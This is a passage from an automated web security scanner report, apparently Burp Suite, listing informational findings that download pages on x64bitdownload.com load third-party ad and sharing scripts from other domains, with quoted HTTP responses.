Date: Mon, 24 Jan 2011 15:17:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1442. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1443. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1444. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:37 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1445. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1446. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1447. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1448. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1449. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1450. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1451. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1452. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1453. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1454. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1455. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1456. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1457. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1458. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249

